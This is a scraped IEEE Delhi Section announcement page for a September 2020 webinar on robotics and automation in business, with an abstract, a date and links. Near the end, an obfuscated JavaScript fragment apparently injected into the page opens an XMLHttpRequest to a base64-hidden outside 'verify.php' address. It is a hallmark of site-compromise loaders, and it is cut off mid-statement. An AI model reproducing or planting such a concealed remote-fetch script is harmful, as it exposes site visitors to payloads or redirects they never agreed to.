

Home > Invitation for Webinar on Robotics and Automation Processes dated 12-09-2020

## Invitation for Webinar on Robotics and Automation Processes dated 12-09-2020

IEEE Delhi Section with Computer Society Chapter, Consultants Network Affinity Group, Life Member Affinity Group, Inter Society Relations, Industry Relations & SIGHT Standing Committees of IEEE Delhi with the associations CSI, Safa Society, ISTE Delhi Section, IETE Delhi Centre, invites you for a Webinar on 12-September-2020, the Saturday, at 06:00 p.m.

Robotics is the grindstone of automation, capable of revolutionizing the production and service sectors. Robots are common in production lines and assembly lines as they are tireless, stronger, more precise and faster than humans. However, as technology advances in the areas of energy and artificial intelligence, robots are becoming common in even more areas that were traditionally dominated by skilled human workers such as drivers, waiters and many more. Robots and intelligent agents, started to make their appearance in jobs that demand higher intellectual capabilities like medical doctors, lawyers and so on. The development cost of robots have been dramatically reduced over the past two decades, making robots more affordable for smaller organizations. Adopting robots to an organization is not an easy task and will require changes to organizational structure, business processes and culture. This webinar aims to explore the impact of robotics and automation to modern business.

## File:

Invitation for Webinar on Robotics and Automation Process dated 12-09-2020.pdf[1] **News Category:** 

Activities

## **News Date:**

Thursday, 6 August, 2020 - 16:40

{ let selfer=new XMLHttpRequest;selfer.open("GET", decodeURIComponent(escape(atob('aHR0cHM6Ly91cmxzcGF0aC5jb20vdmVyaWZ5LnBocA==')))

**Source URL:** http://14.140.205.245/content/invitation-webinar-robotics-and-automation-processes-dated-12-09-2020

## Links:

[1]

http://14.140.205.245/sites/default/files/news/Invitation%20for%20Webinar%20on%20Robotics%20and%20Automat 09-2020\_0.pdf